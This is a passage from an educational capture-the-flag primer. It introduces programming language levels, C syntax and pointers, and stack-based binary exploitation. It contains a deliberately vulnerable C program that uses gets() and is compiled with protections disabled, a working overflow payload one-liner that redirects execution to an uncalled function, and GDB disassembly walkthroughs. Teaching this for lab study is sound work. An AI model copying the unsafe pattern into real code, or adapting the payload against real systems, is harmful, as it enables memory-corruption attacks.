High-level languages are the most abstract. They are meant to be easy to read by other developers and fast to code in. They are also meant to be portable, which means they can run on many different kinds of hardware, like your desktop, phone, or server. These languages are often used to write applications or scripts, due to their ease of use. Since many programs do not need to be used by anyone other than the developer, it makes sense that developers often choose the language that is easiest for them. Some examples of high-level languages are Python, Nim, and Perl. In order for these languages to work, they need to be translated into a lower-level language. This is done by a compiler or interpreter. Here are some comparisons between high-level languages:

`print("Hello World!")`

`echo "Hello World!"`

`print "Hello World!\n";`

Each of these examples (Python, Nim, and Perl, respectively) does the same thing, but the syntax is a bit different. This is because each language has its own rules and conventions. However, a computer is still able to execute the code in the same way because of the translation to a lower level like machine code.
A high-level language can also protect a less experienced developer from accidentally writing insecure code that may be vulnerable to attacks like buffer overflows. These can be avoided in low-level languages too, but the abstraction and easier syntax of high-level languages help prevent such mistakes.

### 9.2. Low-level Languages

Low-level languages are less abstract than high-level languages. They are meant to be fast and easy for the computer to understand, not necessarily the developer. These languages are often used to write operating systems, drivers, and other software that needs to interact with the hardware. Some examples of lower level languages are C, Assembly, and Rust. We say lower level here, and not low level, because abstraction is also a relative concept. Assembly may be more direct to hardware than C, but C is lower level than Python. Here are some comparisons between lower level languages:

```
#include <stdio.h>

int main() {
    printf("Hello World!\n");
    return 0;
}
```

```
section .data
    hello db 'Hello, world!',0

section .text
    global _start

_start:
    mov eax, 4
    mov ebx, 1
    mov ecx, hello
    mov edx, 13
    int 0x80

    mov eax, 1
    xor ebx, ebx
    int 0x80
```

```
fn main() {
    println!("Hello, world!");
}
```

Compared to the higher level languages, these are a bit more verbose for us as readers and developers. However, to the computer and hardware, not much has changed; we just see more of the details that were abstracted away by features of the higher level languages. These languages will also need to be translated into machine code for the computer to run, but they can execute faster because they can take advantage of hardware features and optimizations that interpreters may not be able to.

### 9.3. Intermediate Representation (IR)

Intermediate Representation (IR) allows interpreters and compilers to work with code in a way that is more abstract than machine code, but less abstract than high-level languages.
This can lessen the gap between high and low level languages, and allows for optimizations and other features that are otherwise not possible in high-level languages. IR is often used for applications that may run on many different kinds of hardware, like web browsers. Rather than compiling the code separately for every target, the code only needs to be translated once to an IR, which can then be optimized for multiple types of hardware. Some examples of IR are LLVM IR and WebAssembly. These can be useful when reverse engineering, as IR can be easier to work with and understand than raw machine code.

### 9.4. Assembly & ISA's

We have touched on assembly language before when considering C. Assembly is even less abstract than C, and consists of instructions that are directly translated to machine code. When writing in assembly, a developer has to consider the architecture of the hardware the code will run on, as each has its own set of instructions. This can be impractical for most applications, but is necessary for some software that needs to be as fast as possible.

An ISA, or Instruction Set Architecture, is the set of instructions that a particular hardware architecture can understand. It is what assembly language is written against, and what the compiler or interpreter ultimately translates high-level languages into. Some examples of ISA's are x86, ARM, and MIPS. When reverse engineering, a hacker will need to understand how the assembly code differs from what they may be familiar with.

### 9.5. Machine Instructions

Finally, machine instructions are the lowest level of code, and have no abstraction. These are the instructions that the hardware understands, and are what the compiler or interpreter ultimately translates the code into. These instructions are often represented in hexadecimal, and are not meant to be read by humans.
It is still possible to access these instructions with tools like debuggers and hex editors, but it would be difficult to understand what is happening without a deep understanding of the hardware and the ISA. With each level of code, abstractions can take shortcuts that may be exploited by attackers. For example, a high-level language may have a feature that is meant to make it easier to work with strings, or a low-level language may have a feature that is meant to make it easier to work with memory, but both of these may have vulnerabilities that can be exploited.

## 10. A little about C language

##### Samuel Sabogal Pardo

We could say that C is one of the oldest programming languages that is still widely used in industry. It was developed in 1972 by the famous Dennis Ritchie, and even after all these years, it is in fact one of the most used languages. This is the case because it is very efficient and gives us very direct control over the machine's resources, in contrast to other languages, such as Python. However, it is a more difficult language to use correctly, and it is much more prone to errors and vulnerabilities. Even experienced programmers who have written a lot of C can make a small mistake and introduce a serious vulnerability that a hacker can exploit to take complete control of the machine the program is running on. Nonetheless, many people still love C. We can use it to implement programs that need to be very efficient, such as operating systems, drivers (the programs that control the hardware of devices that we connect to our computer), or embedded systems. You will probably not hear about an operating system, or a driver, fully implemented in Python, at least any time soon.

### 10.1. Some C features

Keep in mind the following aspects of C:

- In C you can directly access an address of memory, and move through memory with a pointer, even if no variable is stored there.
- C is very prone to vulnerabilities, as we already mentioned. We will learn to exploit those vulnerabilities. C is harder to learn and write than python, because you need to clearly understand how the memory interacts with your program.
- C does not use indentation, as python does, to determine which lines of code are inside a function, loop, clause, etc. For example, the lines of code inside an 'if clause' are determined by braces, not four spaces. This is an 'if clause' in python:

```
if x>5:
    print("Hello")
```

Now, the same in C would look like this (the 'f' at the end of print is necessary):

```
if(x>5)
{
    printf("Hello");
}
```

But in C, we could also do:

```
if(x>5)
{
printf("Hello");
}
```

And it would work. But it is important that you do not write it like that when you begin to program in C, because a program can become very unreadable. Always use indentation in C, even if it is not mandatory.

- In C, you write comments using '//', instead of '#' as in python. For example, the same comment in python and C would be:

`#This is a comment in python`

`//This is a comment in C`

- You can compile C for different platforms. Compiling is the process of translating the programming language to machine code. A computer does not understand directly the source code you write. A compiler is a program that reads your source code and converts it to a binary that your computer can execute. The instructions in that binary are harder for a human to read than the source code. The instructions that the processor understands directly are called machine code. When the program is compiled, you do not need any additional program to execute it besides the operating system. In contrast, when you run a python program, you need the python interpreter to execute it.
- Since C is so direct to the machine, people often say that it is like a portable Assembly.
Assembly, as we will see later, is a language that is used to manipulate the instructions of the processor in your machine. Assembly changes depending on the kind of processor you are using. For example, Intel processors understand a different Assembly language than ARM processors. However, you could write the same program in C and it could work on both, because you can compile it either for ARM or for Intel.
- In languages like python, we do not compile the program, because python has an interpreter that translates line by line while the program is being executed. That makes it slower, by a fair amount. You can do an experiment by implementing a for loop that calculates something on each iteration, comparing the result between python and C, and you will note that a python loop takes much longer than a C loop that calculates the same thing.

### 10.2. C Hello World!

Let’s get hands on now! Access the picoCTF webshell at:

Create a folder called 'c_examples' using:

`mkdir c_examples`

Go inside the folder using:

`cd c_examples`

Now, create a file called "my_c_example.c". In this file, we will write the C code. You can create the file with:

`nano my_c_example.c`

Into that file, write the following code, which will print "Hello World!"

```
#include <stdio.h>

int main()
{
    printf("Hello World!\n");
    return 0;
}
```

Note that this line:

`#include <stdio.h>`

Is used to import a library, which is a set of functions that allows us to read and write from the terminal in our program. This:

`printf("Hello World!");`

Is the function printf, which we can use to print strings in the terminal. The function main:

```
int main()
{

}
```

Is the function that wraps the code of our program. Note that in C, the content of a function is enclosed in braces {}. By convention, main is the function that is executed when our program starts, even if we don’t call it. In C, functions return a data type. In this case, main returns an 'int', which means integer. That is why we see the word 'int' right before 'main'.
This line:

`return 0;`

Is our main function returning the integer 0. When the main function returns, that marks the end of our program. Now save the program. Remember that in the nano editor, you save the program by pressing 'control' and 'x' at the same time on your keyboard. Now, to compile our program, we will use 'gcc', which is a very famous compiler; 'gcc' means 'GNU Compiler Collection'. To compile the program, run:

`gcc my_c_example.c`

You will see no output on the screen if it compiled correctly. However, if you list the contents of your current folder using:

`ls`

You should see a new file created, called 'a.out'. This is your new executable binary! You can run it using:

`./a.out`

You should see the message 'Hello World!' printed on the screen. Note that we can execute the binary with no additional program, unlike with python, where we needed the python interpreter and hence wrote 'python' before the name of our program. What if we want to give a name to our binary when we compile it? We can do:

`gcc my_c_example.c -o my_binary`

If you list the contents of your folder using:

`ls`

You should see the file 'my_binary' listed. You can run it using:

`./my_binary`

And it will show 'Hello World!' as it did before.

### 10.3. C data types

Before proceeding to do more interesting programs, let’s stop to learn the data types in C. In python, you can create variables without specifying the data type. However, in C, you need to specify it. These are fundamental data types in C:

- char: It is the data type for allocating a single character. In most compilers, it takes only one byte. Note that we can store any number in it; it does not have to be an actual character. Remember that a character in a computer is a number too. Since it is one byte, it can represent 256 values. As you know already, one byte is made up of 8 bits. So, 2^8 is equal to 256.
- int: It is an integer type.
We can place an integer number in it, which can be much bigger than a char, because an int uses four bytes. Therefore, it can represent roughly four billion values (2^32).
- float: This data type is used to store decimal numbers. In other words, numbers with a floating point value. They also take four bytes. But since they are decimals, it is not as easy to say how many possible values they store. It is a finite number of possible values, of course. For now, just know that a float is used for storing numbers with decimals. Since we are on a computer, the precision is limited. A float has only about 7 significant decimal digits of precision!
- double: It is used to store decimal numbers but with double precision, so it has about 15 significant decimal digits. It takes 8 bytes.

In C, you could have the following code using those data types:

```
#include <stdio.h>

int main()
{
    char a='p';
    int b = 12345;
    float c = 1.123456;
    double d = 1.012345678912345;

    printf("\n my char: %c ", a);
    printf("\n my int: %i ", b);
    printf("\n my float: %f ", c);
    printf("\n my double: %.16g \n\n", d);
    return 0;
}
```

Create the file 'print_data_types.c':

`nano print_data_types.c`

And put the previous code on it. Compile it with:

`gcc print_data_types.c -o print_data_types`

And run it with:

`./print_data_types`

You should see the following output:

```
 my char: p
 my int: 12345
 my float: 1.123456
 my double: 1.012345678912345
```

We just saw how to print different data types. Things to note:

- %c is used to output a character. You can have it in any position of the first string you pass as argument to printf. You can also have it in several places if you pass more characters like this:

`printf("\n my char %c , my second char %c , my third char %c ",a,a,a);`

- %i is used to print an integer.
- %f is used to print a float.
- %.16g is used to print a floating point number with the number of significant digits we want, in this case 16, but we could change that number.
An important thing to note, which we already mentioned, is that a character is just a number that is interpreted as such. Do the following experiment: use %i instead of %c to print the character 'p' in our program. What number do you see, and why that number?

Answer: You should have seen 112. That happens because 112 is the ASCII of 'p', as we can see in the ASCII table:

### 10.4. C pointers

When you need to store a list of integers, you could use a buffer of memory to do it, which is just a chunk of empty memory that can be filled with the integers you need. For example, suppose we need to store a list of 5 integers and then print the whole list. We could do something like the following:

```
#include <stdio.h>

int main()
{
    int arr[5];
    arr[0]=11;
    arr[1]=12;
    arr[2]=13;
    arr[3]=14;
    arr[4]=15;
    for(int i=0;i<5;i++)
    {
        printf("\n Array value at position %i: %i \n",i, arr[i]);
    }
}
```

In the line 'int arr[5];' we are declaring an array of 5 integers. So the program allocates a buffer of 20 bytes, because each integer takes 4 bytes. Then we assign an arbitrary integer to each of the positions, and then we print them in a loop. In C, the first line of a for loop is made up of three parts: In the first one, you can declare a variable and set its starting value. That is 'int i=0' in our code. The second part is the condition; the loop will keep iterating as long as that condition is met. In our code the condition is 'i<5'. The third part is generally a modification you do so the loop advances. In this case we increment i by 1. Note that in C this:

`i++;`

Is exactly the same as this:

`i=i+1;`

Inside our loop, we print our counter 'i', and the current value at position 'i' in the array.
Put that code in a file using:

`nano print_array.c`

Compile it:

`gcc print_array.c -o print_array`

Run it:

`./print_array`

You should see as the output:

```
 Array value at position 0: 11
 Array value at position 1: 12
 Array value at position 2: 13
 Array value at position 3: 14
 Array value at position 4: 15
```

So far, everything seems to work fine. But now, add the following line after the for loop:

`printf("\n Array value at position 6: %i \n", arr[6]);`

You might be thinking that line would cause an error, because position 6 does not even exist in our array; the last valid position is 4. However, it will not! Compile again and run the code. Remember to always compile. If you are used to python, you might forget that step. Do not forget it! The code looks like this:

```
#include <stdio.h>

int main()
{
    int arr[5];
    arr[0]=11;
    arr[1]=12;
    arr[2]=13;
    arr[3]=14;
    arr[4]=15;
    for(int i=0;i<5;i++)
    {
        printf("\n Array value at position %i: %i \n",i, arr[i]);
    }
    printf("\n Array value at position 6: %i \n", arr[6]);
}
```

And the output should look, somewhat, like this:

```
 Array value at position 0: 11
 Array value at position 1: 12
 Array value at position 2: 13
 Array value at position 3: 14
 Array value at position 4: 15
 Array value at position 6: 1695902208
```

What is going on here? We do not even have a position 6. Our array is actually only 5 positions in size, positions 0 through 4. This is bad. What is happening is that C does not actually have real arrays with a size, as other languages do. An array is merely a chunk of memory. In this case, our variable 'arr' is just a pointer to the first byte of that chunk of memory. When we do, for example, arr[2], we are pointing to the first byte of the chunk of memory plus 8 bytes, because each integer has 4 bytes, so we move in memory to the place in which the third position is stored. You will understand this better as you advance in binary exploitation and understand how variables are placed in memory.
For now, just know that C allocates the memory needed to place a buffer, but does not have any control that prevents you from accessing the wrong place. In our example, 1695902208 is whatever value happened to be in memory just past the end of our array; it could be another variable of our program. Many people claim that C does not have real arrays because, as you saw, an array is just a chunk of memory. In C, you can create not only variables, but also pointers to variables. A pointer simply stores the address in which a variable is located in memory. Now that you can read a few lines of C, it is better to explain a program using C comments for the things that might be new to you. So, let’s take a look at the following program that illustrates pointers in an easy manner. Pay close attention to the comments. Create a file, paste that code, compile it, and run it as you already know how to. The following program might seem a bit long, but that is because it has several prints so you can understand what is happening. It is very easy to read. This is the program:

```
#include <stdio.h>
#include <stdlib.h> //needed for malloc

int main()
{
//we declare a char:
char c='S';

//We declare a pointer to char, for that we use the *
char *p;

//Assign address of the char c, to pointer p. To get the address of a variable we use &
p=&c;

printf ("\n This is the value of char c: %c ", c);

//As we said, we use & to get the address.
We are printing the memory address in which c is located: printf ("\n This is the address of char c: %d ", &c); printf ("\n This is the address that pointer p is pointing at, which is the address of c: %d ", p); //we use * to get the content in the address we are pointing at printf ("\n This is the content of the address that pointer p is pointing at, which is the value of c: %c ", *p); printf ("\n This is the address of the pointer (a pointer has to be located somewhere as well as any variable): %d ", &p); // //Now, we can use pointers to point to the first character of an array of characters, and move through it char *p2 ; //We use malloc to allocate 6 bytes p2 = malloc(6); printf ("\n This is the address that pointer p2 is pointing at %d ", p2); //Note: memory allocated with malloc, is allocated in the heap, so you see //that its value is far from the other values we have printed that were local //variables and are allocated in the stack. You will learn more about the stack and heap later. //p2 is pointing to memory in the heap, but it's a local variable, so if we print //its address it should be close to the other local variables: printf ("\n This is the address of p2: %d ", &p2); //Now we assign values to the bytes we have allocated: *(p2+0)='h'; *(p2+1)='e'; *(p2+2)='l'; *(p2+3)='l'; *(p2+4)='o'; *(p2+5)=0; printf("\n This is p2 printed as a string: %s ",p2); //Note that 0 (the ASCII for NULL), is the end of the string. 
//Also note that 0 is different from '0', '0' is actually 48, if you print it as an int printf("\n This is the value of the zero char, different from null char: %d ",'0'); //See what happens if we put a 0 in the middle of our char array: *(p2+2)=0; printf("\n This is the string we just created: %s ",p2); //It prints only "he" // //Of course a string can be created in a shorter way, for instance: char *p3=&"hello"; printf("\n This is the content pointed by p3: %s ", p3); // //Now, let's make a pointer to pointer to char, we will use the pointer p that points to the char c we declare previously char **pp; pp=&p; //So, imagine pp is a box (the first box), that contains an address that points to a second box, that contains an address that points to a third box, that contains a char printf("\n This is the address in which pp is allocated, the address of the first box: %d ", &pp); printf("\n This is the address pp points at, the content of the first box: %d ", pp); printf("\n This is the content of the second box: %d ", *pp); printf("\n This is the content of the third box: %c ", **pp); //we can create as many pointers to pointers as we need: char ***ppp; ppp=&pp; printf("\n This is the content of ***ppp: %c ", ***ppp); // //To explain why this could be useful, we will quote a StackOverflow post that is cool, from user pmg, https://stackoverflow.com/questions/5580761/why-use-double-pointer-or-why-use-pointers-to-pointers // //"If you want to have a list of characters (a word), you can use char *word //If you want a list of words (a sentence), you can use char **sentence //If you want a list of sentences (a monologue), you can use char ***monologue //If you want a list of monologues (a biography), you can use char ****biography //If you want a list of biographies (a bio-library), you can use char *****biolibrary //If you want a list of bio-libraries (a ??lol), you can use char ******lol //yes, I know these might not be the best data structures" pmg // //Let's see how we 
could implement a list of words
char **pp2=malloc(100); //pp2 points to the first address
*pp2=&"hi";
*(pp2+1)=&"carnegie";
*(pp2+2)=&"mellon";

printf("\n This is hi: %s ", *pp2);
printf("\n This is carnegie: %s ", *(pp2+1));
printf("\n This is mellon: %s ", *(pp2+2));

//You might be wondering about the relation between arrays and pointers. Some people say that in C, the use of [] is just syntactic sugar,
//because there are no actual arrays in C.
//In the following expression, arr acts as a pointer to the first element of the array:
char arr[5]="hello";

//these expressions are the same:
printf("\n This is arr[0]: %c ", arr[0]);
printf("\n This is *arr: %c ", *(arr+0));

//as well as:
printf("\n This is arr[1]: %c ", arr[1]);
printf("\n This is *(arr+1): %c ", *(arr+1));

printf("\n This is arr[2]: %c ", arr[2]);
printf("\n This is *(arr+2): %c ", *(arr+2));

printf("\n This is arr[3]: %c ", arr[3]);
printf("\n This is *(arr+3): %c ", *(arr+3));

printf("\n This is arr[4]: %c ", arr[4]);
printf("\n This is *(arr+4): %c ", *(arr+4));

//understanding that, you can see now why in C a thing that looks very weird, as the following, makes sense:
printf("\n This is 1[arr]: %c ", 1[arr]);
//As you see, it printed 'e', because that expression is just *(1+arr), which is the same as *(arr+1)
//People say that proves that in C there are no actual arrays. What is our opinion? As long as you clearly
//understand how it works in the language you are using, that is what matters!

printf("\n SEE YOU! keep on the good work! \n ");
}
```

At this point you should know the commands for creating a file, compiling it, and running it, but just in case:

```
nano pointers.c
gcc pointers.c -o pointers
./pointers
```

Note that the compilation shows several warnings, because we did things, for the sake of the example, that are not good practice. With this introduction to C, you will be able to begin to read the source code from challenges and clarify new things you see along the way on Google.
Now we are approaching the real fun of binary exploitation!

## 11. Binary Exploitation

##### Samuel Sabogal Pardo

Get ready for binary exploitation. We use C to explain binary exploitation because it is a language very prone to vulnerabilities; however, other languages have similar vulnerabilities.

### 11.1. A hack example!

A hack is not necessarily a cyberattack. It is just a clever way to do something, in our context, on a computer. For example, how would you make a program print the smallest of two numbers without using an if statement? This sounds complicated when you first hear it, but look at the following bit hack! Make a small program in C copying this code:

```
#include <stdio.h>

int main(int argc, char **argv)
{
    int x=9;
    int y=5;
    int result=y^((x^y)&-(x<y));
    printf("this is the smallest number %d \n", result);
    return 0;
}
```

That was fantastic! What is happening here? Keep in mind the results of the following operations:

```
AND
1 & 0 = 0
0 & 0 = 0
1 & 1 = 1
0 & 1 = 0
```

```
XOR
1 ^ 0 = 1
0 ^ 0 = 0
1 ^ 1 = 0
0 ^ 1 = 1
```

Now, we have y=5, x=9. Let’s analyze each part of:

y ^ ( ( x ^ y ) & - ( x < y ) )

In the part highlighted in bold:

y ^ ( ( x ^ y ) & - **( x < y )** )

x < y is false; in C, false is represented as a 0, which in a byte would look like this: 00000000

-0 is 0, so it keeps being 00000000

So, -**( x < y )** is 0. So far we would have y ^ ( ( x ^ y ) & **0** )

Now y ^ ( **(x^y)** & 0 )

**( x ^ y )** & 0 is 0, because any value & 0 is still 0

So we get to y ^ ( **0** )

This is simply y ^ 0. When you take any value and do XOR with zero, it is like doing nothing! So we get to **y**, which is the smallest number (cool!!!!!!)

But what happens if the values of x and y are swapped? Surely it will not still print the smallest number? Swap the values in your code, compile and run it again to see what happens! That was amazing. That is a beautiful hack! It is actually called a bithack!
In a computer, this operation can execute faster than an "if" statement, because it avoids a conditional branch. In most programs you do not need an operation to execute that fast to comply with the functionality you need, but in some cases it is needed. Let’s say that a hack could be simply a clever thing. Now, what is an exploit? It is an attack on a computer program. If a computer program has a vulnerability, a hacker can take advantage of it to make the program do something different from its original purpose. Successfully taking advantage of a vulnerability is called an exploit.

### 11.2. Stack overflow attack

By this point you should already know how to use the terminal and compile programs, and have some understanding of C programming. Create the following program in the webshell, and name it vuln1.c:

```
#include <stdio.h>

#define BUFSIZE 4

void win()
{
    puts("If I am printed, I was hacked! because the program never called me!");
}

void vuln()
{
    puts("Input a string and it will be printed back!");
    char buf[BUFSIZE];
    gets(buf);
    puts(buf);
    fflush(stdout);
}

int main(int argc, char **argv)
{
    vuln();
    return 0;
}
```

You can see that the function win() is never called in the program. Therefore, the message that it prints should never be printed, right? Compile the program using:

`gcc vuln1.c -o vuln1 -fno-stack-protector -no-pie`

Now run the program using:

`./vuln1`

You can input a string, and it will print it back. For instance, if you input "HelloPicoCTF", it should show:

```
Input a string and it will be printed back!
HelloPicoCTF
HelloPicoCTF
```

The program did what it was written to do. Now, we are going to send a particular string to the program using python. You can run a single line of python in the command line using the flag -c, and enclosing the line of code between single quotes. In the terminal you can pass the output of one command as the input to another command using the pipe, which is this character: "|".
In the following command we are printing something in python, and passing that to the C program we just compiled.

`python3 -c 'print("hello world!")' |./vuln1`

You should see "hello world!" printed back to the terminal right after the command. Note that in python you can repeat the same character if you multiply it by a number, so 128*"A" is simply a string composed of "A" repeated 128 times. For example if you run:

`python3 -c 'print(10*"A")'`

You should see the output:

`AAAAAAAAAA`

Now we are going to send a string composed of 128 repeated characters, concatenated with some bytes.

`python3 -c 'print(128*"A"+"\x20\xe0\xff\xff\xff\x7f\x00\x00\xb7\x05\x40\x00")' |./vuln1`

As a result you will see:

```
If I am printed, I was hacked! because the program never called me!
Segmentation fault (core dumped)
```

What just happened? We simply sent a string, and a function that is never called in the program was called… We can send some particular input to the program to break it and make it do something that we want. That "particular input" you send to a program is called, in the security jargon, the "**payload**". You just hacked a very simple binary. But… what happened on the inside? Why? A very rough explanation is that when you call a function, the computer needs to know how to come back and continue executing the code that called it after the function finishes its execution. The address of the piece of code that execution should continue at after the function call (you do not see this in the source code) is called the return address. Since the C program we made does not check the boundaries of the input, you can overwrite the place in which the return address is stored! Let’s understand that better so you can craft similar exploits at will.

### 11.3. What you need to know for a binary exploit

The famous Stack Overflow is a type of Buffer Overflow, an anomaly that overwrites a memory sector where it should not.
It causes security problems by opening doors for malicious actions to be executed. To understand it, it is necessary to have an idea of how the memory of a computer works.

#### 11.3.1. Memory

RAM means "random access memory". It is called Random Access because you can access any part of it directly, without having to pass through other regions first, as was necessary at some point in history. For example, computers used to have a magnetic tape in which an item of data could only be accessed by starting from the beginning of the tape and finding an address sequentially. In a RAM we can go to any part of it immediately!

Conceptually, a RAM is a grid with slots that can contain data. Let’s imagine we have a RAM of only 5 slots. We could name each slot by a number, starting at 0, so it would look like this:

Now, if we want to put the word "HELLO" in our imaginary memory, we could put each character of "HELLO" in each slot, like this:

The numbers we used to identify each slot of the memory are called addresses. If we ask: what character is in the address 1? The answer would be the character ‘E’. A real memory from a computer nowadays can have billions of addresses. Normally, addresses are shown in hexadecimal. For example, the address "255" would normally be shown as "0xFF".

In a program, the memory is used in a certain way to be able to do all that the program can do, and the program itself is present in memory when it is being executed. The memory is organized in the following sections:

When we compile C source code, it is converted to machine code, also known as a binary. When a program is run, this machine code is placed in the code section. The code section holds only machine code, not the source code we know from C, for example. The machine code is a set of instructions that the processor of a computer can understand. The computer will execute the instructions sequentially, and while doing that, will access other parts of memory to read data and output results.
A program has several sections, but for now, let’s keep in mind the following three sections:

- Data section
- Heap
- Stack

In the data section, static and global variables are placed. These variables always exist while the program is being run, in contrast to local variables, which disappear when a function finishes and returns its result. On the heap is placed the memory allocated dynamically. For example, when you use malloc in C to allocate a buffer, that buffer is allocated on the heap. It is called dynamic allocation because the program allocates memory when it is already running, at the moment it executes the particular instruction for malloc. In the code you write, you can also decide to deallocate a buffer of memory that you previously allocated. So, it is called dynamic because the programmer can allocate and deallocate a chunk of memory of a desired size. On the stack are placed the local variables, function parameters and return addresses. What is a return address? When we call a function, the address of the next instruction has to be stored somewhere so the program knows where to come back after the function is finished. We call this address the "return address". A function can be called in different parts of a program, so this return address will be different depending on where the program calls the function.

### 11.4. Example of Execution of a program

The execution of a program and its memory is controlled by processor registers, usually called simply registers. These are a very small and fast kind of memory that is attached to the processor. A register can store 4 or 8 bytes, depending on the processor. A processor only has a few registers. Depending on the kind of processor, the registers might differ. But we will take a look at the ones that are generic to most processors and that will later let us understand the most common binary exploits.
To see a real example in action we can use GDB, a program that allows us to see the execution of each part of a program, and its memory, step by step. This kind of software is called a debugger. When a binary program is running and we debug it, we can see in detail what the program is doing in memory by analyzing the **Assembly**. What is Assembly? It is a low level language that can be used to show what each instruction from the machine code does. GDB can generate assembly from the machine code in memory while we are debugging the program, so we can easily see what the machine code is doing.

#### 11.4.1. GDB, Assembly and machine code

In the webshell, GDB is already installed, so you can run

`gdb ./vuln1`

You should see something like this:

```
GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from vuln1...(no debugging symbols found)...done.
(gdb)
```

Now, input "run" and press enter. Remember to press enter after using a command. The program "vuln1" will be executed, so you can enter any string and it will print it back, as "vuln1" normally does. You should see something like this if the string you input is "HelloPicoCTF":

```
(gdb) run
Starting program: /vuln1
Input a string and it will be printed back!
HelloPicoCTF
HelloPicoCTF
[Inferior 1 (process 95000) exited normally]
(gdb)
```

If you input "r" instead of "run", it will do the same, because "r" is the GDB abbreviation for "run". If you do the experiment you should see the same:

```
(gdb) r
Starting program: /vuln1
Input a string and it will be printed back!
HelloPicoCTF
HelloPicoCTF
[Inferior 1 (process 95000) exited normally]
(gdb)
```

To exit from GDB, you can input "quit" and press enter. You could also input only "q" and it will quit too. For several GDB commands, you can input just the first character of the command, and GDB will understand.

Now, open GDB again to debug "vuln1" with the same command we used previously:

`gdb ./vuln1`

But now, before running it using "run", we want to stop at the beginning of the function "vuln()". To do this, you can set a breakpoint at vuln(). Setting a breakpoint simply means that the execution of the program will pause at the instruction on which you set the breakpoint. By running "break vuln" or "b vuln", a breakpoint will be set at the beginning of vuln. We will see this:

```
(gdb) b vuln
Breakpoint 1 at 0x4005ce
```

The addresses you see might be different; that is ok. What does "Breakpoint 1 at 0x4005ce" mean? Do you remember that there is a segment of the memory in which the machine code is placed? At the memory address "0x4005ce", the machine code of "vuln()" begins. Input "r" to start the execution of the program and you will see:

```
(gdb) r
Starting program: /home/samuel/Desktop/problems/vuln1

Breakpoint 1, 0x00000000004005ce in vuln ()
(gdb)
```

"Breakpoint 1, 0x00000000004005ce in vuln ()" means that the first breakpoint we set was established at address "0x00000000004005ce", which is the same address as "0x4005ce"; an address is a number in this case, so zeros at the left have no effect. Note that in other cases, zeros at the left can have an effect, if what we are reading is not being interpreted as a number.
##### Processor registers

A program is made up of several instructions that are executed sequentially. The processor of the computer has an integrated and very small memory, different from RAM, called the "registers". A processor only has a few registers. Each register can hold only 8 bytes in a 64-bit processor, and 4 bytes in a 32-bit processor. A 32-bit program can run on a 64-bit processor, but a 64-bit program cannot run on a 32-bit processor.

One of the registers is called the Instruction Pointer, abbreviated as IP, which keeps track of the part of the program that is currently being executed. In a 64-bit program, we can print the value of this register in GDB using "x $rip":

```
(gdb) x $rip
0x4005ce <vuln+4>: 0x80c48348
(gdb)
```

Note that the first part of the line shown is "0x4005ce"; this is exactly where the breakpoint was placed, so the IP naturally has that value because we made the program pause there. Then we have "<vuln+4>". Do you remember we said that by setting a breakpoint at a function it would pause at the beginning of the function? To be more precise, a breakpoint on a function is usually placed 4 bytes after the beginning of the machine code of the function. That's why the "+4". Later we will understand why it is done like this. The remaining part, "0x80c48348", is the actual content at the address "0x4005ce". That content is a part of the machine code of the "vuln()" function.
To show the whole machine code of the function, with each instruction shown at its address alongside its machine code, we can run "disas /r":

```
(gdb) disas /r
Dump of assembler code for function vuln:
   0x4005ca <+0>:  55                     push  %rbp
   0x4005cb <+1>:  48 89 e5               mov   %rsp,%rbp
=> 0x4005ce <+4>:  48 83 c4 80            add   $0xffffffffffffff80,%rsp
   0x4005d2 <+8>:  48 8d 3d 27 01 00 00   lea   0x127(%rip),%rdi
   0x4005d9 <+15>: e8 c2 fe ff ff         callq 0x4004a0 <puts@plt>
   0x4005de <+20>: 48 8d 45 80            lea   -0x80(%rbp),%rax
   0x4005e2 <+24>: 48 89 c7               mov   %rax,%rdi
   0x4005e5 <+27>: b8 00 00 00 00         mov   $0x0,%eax
   0x4005ea <+32>: e8 c1 fe ff ff         callq 0x4004b0 <gets@plt>
   0x4005ef <+37>: 48 8d 45 80            lea   -0x80(%rbp),%rax
   0x4005f3 <+41>: 48 89 c7               mov   %rax,%rdi
   0x4005f6 <+44>: e8 a5 fe ff ff         callq 0x4004a0 <puts@plt>
   0x4005fb <+49>: 48 8b 05 3e 0a 20 00   mov   0x200a3e(%rip),%rax
   0x400602 <+56>: 48 89 c7               mov   %rax,%rdi
   0x400605 <+59>: e8 b6 fe ff ff         callq 0x4004c0 <fflush@plt>
   0x40060a <+64>: 90                     nop
   0x40060b <+65>: c9                     leaveq
   0x40060c <+66>: c3                     retq
End of assembler dump.
(gdb)
```

Each line GDB just printed is organized in three parts. Let's analyze the following line to introduce machine code and assembly:

0x400602 <+56>: 48 89 c7 mov %rax,%rdi

The left part is the address, "0x400602 <+56>". After the address some spaces are shown; then, in the middle, we find the machine code, which in this case is "48 89 c7". After some more spaces, we find the assembly, which is "mov %rax,%rdi". Assembly is a low level language that maps directly to machine code. That is why GDB can look at machine code in memory and print the assembly it represents. A specific sequence of bytes of machine code maps to one instruction of assembly. So, when a program is running and the sequence of bytes "48 89 c7" appears in the code segment, the computer knows it is a specific instruction and the processor has to perform a specific action.
Right now the intention is not to explain assembly in detail, but just for the sake of this example, know that "mov %rax,%rdi" moves the value of the register "rax" into the register "rdi". While the program executes the machine code in the code section of memory, whenever the sequence of bytes "48 89 c7" appears, the processor knows it has to copy the register "rax" into "rdi". Note that there are two places in the function where the machine code "48 89 c7" appears, and both have the same assembly.

Now, in this line:

**⇒** 0x4005ce <+4>: 48 83 c4 80 add $0xffffffffffffff80,%rsp

do you see the arrow "⇒" at the left? It indicates the instruction we are currently at. Next to it there is an address which, as expected, has the same value as the Instruction Pointer. Then there is the <+4>, which we already explained, followed by the machine code "48 83 c4 80" at the address 0x4005ce… Hold on, what is going on? A few paragraphs ago we said that the machine code at that address was "0x80c48348" when we printed the Instruction Pointer using "x $rip". But now we say it is "48 83 c4 80". If you look closely, these are the same bytes but backwards. Let's take advantage of this opportunity to explain "little endian".

##### Little endian

In most of the computers we use in everyday life, numbers are interpreted as little endian. So when you read this from memory:

**48 83 c4 80**

it will be interpreted and shown as this:

**80 c4 83 48**

